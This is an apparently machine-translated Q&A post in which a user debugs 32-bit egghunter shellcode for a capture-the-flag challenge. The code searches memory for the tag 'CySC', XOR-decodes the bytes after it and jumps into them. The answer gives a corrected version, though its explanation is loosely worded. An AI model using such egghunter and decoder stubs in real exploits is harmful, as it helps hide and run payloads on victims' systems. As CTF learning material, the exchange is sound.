我正在编写shellcode来解决一个infosec挑战,需要首先在内存中找到一个鸡蛋“CySC”,然后xor在egg标签的内存地址之后继续255个字节,使用内存地址的最后一个字节鸡蛋标签。这是我到目前为止所提出的,但我得到第19行的上述错误,即'xor [eax + bl],cl'指令。
BITS 32
start:
mov eax, 0xb7469FFF ;this is one byte before the start of where the code "CySC" can be found
mov ebx, 'CySC' ;obvious.
compare:
inc eax ;move to the next byte, which is the start of the range where "CySC" can be found
cmp [eax], ebx ;does the data located at eax equal "CySC" ?
jne compare ;Loop if not, increment eax by one and check next mem add
foundit:
xor ecx, ecx ;zero out ecx to store the last byte of eax's mem address where "CySC" is located. Remember this is what we will xor the rest of the shellcode with.
mov cl, al ;move the last byte of eax into cl
xor ebx, ebx ;zero out ebx for use as a counter in the next loop
deobfuscate:
dec bl ;subtract 1 from bl, the first loop will be 255 (ff)
xor [eax+bl],cl ;look at what is located at eax+bl (eax+255 first loop)
cmp [bl], 4 ;is bl counter equal to 4?
jne deobfuscate ;if it is continue, if not loop
runshellcode:
add eax, 4 ;add 4 to x as this is our egg tag "CySC"
call eax ;execute shellcode at eax
任何建议都会非常感谢!
答案 0 :(得分:0)
问题出在" xor [eax + bl],al",因为[]括号表示其中的所有内容都是指向位于内存地址的值的指针...所以bl =第一个循环中的0xFF,显然是无效的mem地址。所以我把它改成了#34; xor [eax + ebx],al"拉取位于ebx的值,它有效。拿到了我的旗帜!谢谢你的帮助。
BITS 32
start:
mov eax, 0xb7469FFF
mov ebx, 'CySC'
compare:
inc eax
cmp [eax], ebx
jne compare
foundit:
xor ecx, ecx
mov cl, al
xor ebx, ebx
deobfuscate:
dec bl
xor [eax+ebx],al
cmp bl, 0x4
jne deobfuscate
execute:
add eax, 4
call eax